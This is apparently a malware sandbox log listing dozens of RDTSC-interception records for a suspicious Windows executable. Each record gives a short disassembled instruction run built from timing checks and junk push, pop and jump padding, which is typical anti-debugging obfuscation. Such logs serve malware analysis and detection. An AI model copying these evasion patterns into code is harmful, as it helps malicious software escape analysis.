                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D1CA8 second address: 5D1CAE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D1CAE second address: 5D1CB2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 585353 second address: 58535D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FC69CB9B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 58535D second address: 58536D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ecx 0x00000009 pop ecx 0x0000000a jno 00007FC69CE9FC56h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5CFEB9 second address: 5CFEBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D52AF second address: 5D52B6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D1FA0 second address: 5D1FD3 instructions: 0x00000000 rdtsc 0x00000002 jng 00007FC69CB9B4BDh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c jng 00007FC69CB9B4A8h 0x00000012 push eax 0x00000013 push edx 0x00000014 jc 00007FC69CB9B4A6h 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D70F1 second address: 5D7120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FC69CE9FC62h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f jmp 00007FC69CE9FC62h 0x00000014 pop edx 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D7120 second address: 5D7126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D7126 second address: 5D716F instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f push edx 0x00000010 call 00007FC69CE9FC58h 0x00000015 pop edx 0x00000016 mov dword ptr [esp+04h], edx 0x0000001a add dword ptr [esp+04h], 0000001Bh 0x00000022 inc edx 0x00000023 push edx 0x00000024 ret 0x00000025 pop edx 0x00000026 ret 0x00000027 mov edi, 757E11E4h 0x0000002c push 00000000h 0x0000002e sbb bh, FFFFFFD6h 0x00000031 push 00000000h 0x00000033 xor edi, 70B1410Dh 0x00000039 push eax 0x0000003a push eax 0x0000003b push edx 0x0000003c push eax 0x0000003d push edx 0x0000003e pop edx 0x0000003f pop eax 0x00000040 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D72F5 second address: 5D72FB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D72FB second address: 5D7390 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 nop 0x00000009 mov bl, 43h 0x0000000b push dword ptr fs:[00000000h] 0x00000012 mov edi, dword ptr [ebp+124574ABh] 0x00000018 mov dword ptr fs:[00000000h], esp 0x0000001f mov edi, 0A8BB338h 0x00000024 mov eax, dword ptr [ebp+122D1389h] 0x0000002a push 00000000h 0x0000002c push eax 0x0000002d call 00007FC69CE9FC58h 0x00000032 pop eax 0x00000033 mov dword ptr [esp+04h], eax 0x00000037 add dword ptr [esp+04h], 00000015h 0x0000003f inc eax 0x00000040 push eax 0x00000041 ret 0x00000042 pop eax 0x00000043 ret 0x00000044 mov edi, dword ptr [ebp+122D30E1h] 0x0000004a mov bx, A2A6h 0x0000004e push FFFFFFFFh 0x00000050 push 00000000h 0x00000052 push edi 0x00000053 call 00007FC69CE9FC58h 0x00000058 pop edi 0x00000059 mov dword ptr [esp+04h], edi 0x0000005d add dword ptr [esp+04h], 00000015h 0x00000065 inc edi 0x00000066 push edi 0x00000067 ret 0x00000068 pop edi 0x00000069 ret 0x0000006a jmp 00007FC69CE9FC5Ah 0x0000006f push eax 0x00000070 pushad 0x00000071 push eax 0x00000072 push edx 0x00000073 jmp 00007FC69CE9FC67h 0x00000078 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D8299 second address: 5D829D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5D829D second address: 5D836A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], eax 0x0000000a mov di, ax 0x0000000d push dword ptr fs:[00000000h] 0x00000014 push 00000000h 0x00000016 push ebp 0x00000017 call 00007FC69CE9FC58h 0x0000001c pop ebp 0x0000001d mov dword ptr [esp+04h], ebp 0x00000021 add dword ptr [esp+04h], 00000019h 0x00000029 inc ebp 0x0000002a push ebp 0x0000002b ret 0x0000002c pop ebp 0x0000002d ret 0x0000002e jns 00007FC69CE9FC5Bh 0x00000034 jmp 00007FC69CE9FC60h 0x00000039 mov dword ptr fs:[00000000h], esp 0x00000040 mov dword ptr [ebp+122D5B72h], edi 0x00000046 mov eax, dword ptr [ebp+122D022Dh] 0x0000004c push 00000000h 0x0000004e push ebx 0x0000004f call 00007FC69CE9FC58h 0x00000054 pop ebx 0x00000055 mov dword ptr [esp+04h], ebx 0x00000059 add dword ptr [esp+04h], 0000001Ah 0x00000061 inc ebx 0x00000062 push ebx 0x00000063 ret 0x00000064 pop ebx 0x00000065 ret 0x00000066 mov dword ptr [ebp+122D2565h], esi 0x0000006c movzx edi, di 0x0000006f push FFFFFFFFh 0x00000071 jmp 00007FC69CE9FC69h 0x00000076 or bx, F5E1h 0x0000007b nop 0x0000007c pushad 0x0000007d jmp 00007FC69CE9FC68h 0x00000082 pushad 0x00000083 push eax 0x00000084 pop eax 0x00000085 push eax 0x00000086 push edx 0x00000087 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E20E4 second address: 5E20E8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E20E8 second address: 5E210E instructions: 0x00000000 rdtsc 0x00000002 jc 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC69CE9FC68h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E210E second address: 5E2122 instructions: 0x00000000 rdtsc 0x00000002 js 00007FC69CB9B4A6h 0x00000008 jnl 00007FC69CB9B4A6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 push esi 0x00000013 pop esi 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E2122 second address: 5E2126 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E2126 second address: 5E2146 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a jmp 00007FC69CB9B4B3h 0x0000000f pushad 0x00000010 popad 0x00000011 pop ebx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E185F second address: 5E1863 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E1863 second address: 5E1869 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E1869 second address: 5E1875 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 pop eax 0x00000006 jnc 00007FC69CE9FC56h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E19CC second address: 5E19D0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E19D0 second address: 5E1A0E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebx 0x00000009 pushad 0x0000000a jmp 00007FC69CE9FC67h 0x0000000f jmp 00007FC69CE9FC65h 0x00000014 push eax 0x00000015 push edx 0x00000016 jbe 00007FC69CE9FC56h 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E1B99 second address: 5E1BBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jp 00007FC69CB9B4B8h 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E1BBA second address: 5E1BBE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E1BBE second address: 5E1BC8 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E1BC8 second address: 5E1BCE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E6DA5 second address: 5E6DCB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d jnp 00007FC69CB9B4A6h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E6DCB second address: 5E6DD8 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push esi 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E6DD8 second address: 5E6DE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 popad 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push edx 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E6DE6 second address: 5E6DF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 mov eax, dword ptr [eax] 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E6DF3 second address: 5E6DF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E6DF9 second address: 5E6DFE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E6DFE second address: 5E6E08 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 ja 00007FC69CB9B4A6h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E6EED second address: 5E6F0C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CE9FC63h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edi 0x0000000c pushad 0x0000000d push eax 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E6F0C second address: 5E6F53 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 mov eax, dword ptr [esp+04h] 0x0000000a push ebx 0x0000000b js 00007FC69CB9B4A8h 0x00000011 pushad 0x00000012 popad 0x00000013 pop ebx 0x00000014 mov eax, dword ptr [eax] 0x00000016 pushad 0x00000017 jmp 00007FC69CB9B4B5h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC69CB9B4B9h 0x00000023 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5E7030 second address: 5E7034 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ED566 second address: 5ED56C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ED56C second address: 5ED575 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push eax 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ED575 second address: 5ED581 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FC69CB9B4AEh 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ED581 second address: 5ED58A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 push edx 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5EC1E5 second address: 5EC1FC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4AFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5EC1FC second address: 5EC204 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5EC77B second address: 5EC785 instructions: 0x00000000 rdtsc 0x00000002 jp 00007FC69CB9B4A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5EC785 second address: 5EC7A1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 jmp 00007FC69CE9FC63h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5EC7A1 second address: 5EC7BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FC69CB9B4AEh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5EC7BA second address: 5EC7CF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69CE9FC5Fh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5EC7CF second address: 5EC7FB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jmp 00007FC69CB9B4ADh 0x00000008 jno 00007FC69CB9B4A6h 0x0000000e pop edi 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC69CB9B4B0h 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ECBE4 second address: 5ECBED instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push ebx 0x00000006 push edx 0x00000007 pop edx 0x00000008 pop ebx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ECBED second address: 5ECBF3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ECBF3 second address: 5ECC41 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FC69CE9FC56h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FC69CE9FC66h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 jns 00007FC69CE9FC6Bh 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007FC69CE9FC5Ch 0x00000021 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ECDAC second address: 5ECDCA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CB9B4B9h 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ECDCA second address: 5ECDE2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC69CE9FC62h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ECDE2 second address: 5ECDE6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ECF7D second address: 5ECF84 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ECF84 second address: 5ECFB7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop eax 0x00000007 jmp 00007FC69CB9B4ADh 0x0000000c jl 00007FC69CB9B4A6h 0x00000012 popad 0x00000013 pushad 0x00000014 jmp 00007FC69CB9B4B5h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ED14F second address: 5ED158 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ED158 second address: 5ED15C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ED15C second address: 5ED160 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ED2AF second address: 5ED2B3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5ED2B3 second address: 5ED2B7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F1799 second address: 5F179D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F5F25 second address: 5F5F29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F5F29 second address: 5F5F39 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 pushad 0x00000009 popad 0x0000000a jne 00007FC69CB9B4A6h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6634 second address: 5F663A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F663A second address: 5F663E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F663E second address: 5F6642 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6642 second address: 5F6648 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F68E5 second address: 5F68E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F68E9 second address: 5F6919 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC69CB9B4B6h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC69CB9B4A8h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC69CB9B4AAh 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6A4F second address: 5F6A53 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6BA8 second address: 5F6BC9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jmp 00007FC69CB9B4ACh 0x0000000e pop edi 0x0000000f pushad 0x00000010 jo 00007FC69CB9B4AEh 0x00000016 pushad 0x00000017 popad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6BC9 second address: 5F6BDB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push edi 0x00000007 pop edi 0x00000008 jmp 00007FC69CE9FC5Ah 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6BDB second address: 5F6BDF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6BDF second address: 5F6BE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6BE5 second address: 5F6BEE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6D48 second address: 5F6D91 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CE9FC67h 0x00000009 jmp 00007FC69CE9FC66h 0x0000000e popad 0x0000000f pushad 0x00000010 pushad 0x00000011 popad 0x00000012 jmp 00007FC69CE9FC5Ch 0x00000017 pushad 0x00000018 popad 0x00000019 pushad 0x0000001a popad 0x0000001b popad 0x0000001c pushad 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6D91 second address: 5F6D97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6D97 second address: 5F6DB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FC69CE9FC5Eh 0x00000009 popad 0x0000000a popad 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jp 00007FC69CE9FC56h 0x00000014 push ecx 0x00000015 pop ecx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6DB6 second address: 5F6DD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FC69CB9B4B6h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6DD6 second address: 5F6DDA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zLP3oiwG1g.exeRDTSC instruction interceptor: First address: 5F6F42 second address: 5F6F46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
